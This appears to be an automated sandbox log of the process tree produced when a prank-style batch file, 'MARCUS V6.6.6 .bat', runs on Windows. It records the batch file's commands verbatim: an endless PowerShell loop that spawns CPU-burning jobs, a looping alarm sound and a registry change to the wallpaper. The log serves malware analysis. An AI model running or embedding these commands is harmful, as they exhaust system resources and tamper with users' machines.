C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=4268,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=4252 /prefetch:12⤵PID:5636
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=6732,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7060 /prefetch:12⤵PID:5996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=4380,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6836 /prefetch:12⤵PID:6016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=7352,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7292 /prefetch:12⤵PID:4204
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=7120,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6808 /prefetch:12⤵PID:2600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=7416,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6608 /prefetch:12⤵PID:2292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=7568,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7504 /prefetch:12⤵PID:5184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=7196,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6888 /prefetch:12⤵PID:5572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=7176,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7220 /prefetch:12⤵PID:4948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4340,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=3684 /prefetch:82⤵PID:5864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=4232,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7744 /prefetch:12⤵PID:5872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8108,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=8120 /prefetch:82⤵PID:5888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=4276,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=3468 /prefetch:12⤵PID:5124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=7728,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=8008 /prefetch:12⤵PID:6084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=8232,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=8240 /prefetch:12⤵PID:5892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4504,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6668 /prefetch:82⤵PID:5224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4540,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=4556 /prefetch:82⤵PID:5064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7684,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=4324 /prefetch:82⤵PID:3172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7732,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7948 /prefetch:82⤵PID:6428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:3232
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5344
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat"1⤵PID:5104
-
C:\Windows\system32\chcp.comchcp 12502⤵PID:5424
-
-
C:\Windows\system32\mode.commode 85,302⤵PID:5700
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat?.WSF//Job:Nyan"2⤵PID:876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "(New-Object Media.SoundPlayer 'C:\Windows\Media\alarm.mp3').PlayLooping()"2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4360
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\magnus\matrix.bmp" /f2⤵
- Sets desktop wallpaper using registry
PID:3120
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "while(1) { Start-Job -ScriptBlock { while(1) { [Math]::Pow([Math]::PI, [Math]::E) } } }"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3968 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5600
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5216
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5164
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5416
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5428
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6204
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:7132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:7304
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:7472
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:7624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:7752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:7892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:8028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:8160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:7268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:7736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:8112
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:7720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:8212
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:8344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:8476
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:8604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:8736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:8864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:9000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:9148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:8308
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:7968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:9020
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:8584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:8716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:9320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:9452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:9596
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:9764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:9904
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:10032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:10164
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:9416
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:9756
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:10160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:9392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:10268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:10400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
PID:10528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
PID:10664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
PID:10804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
PID:10936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
PID:11068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
PID:11204 -
C:\Windows\system32\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "11204" "1876" "1792" "1880" "0" "0" "1884" "0" "0" "0" "0" "0"4⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:10384
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat" "1⤵PID:9584
-
C:\Windows\system32\chcp.comchcp 12502⤵PID:10396
-
-
C:\Windows\system32\mode.commode 85,302⤵PID:11108
-
-
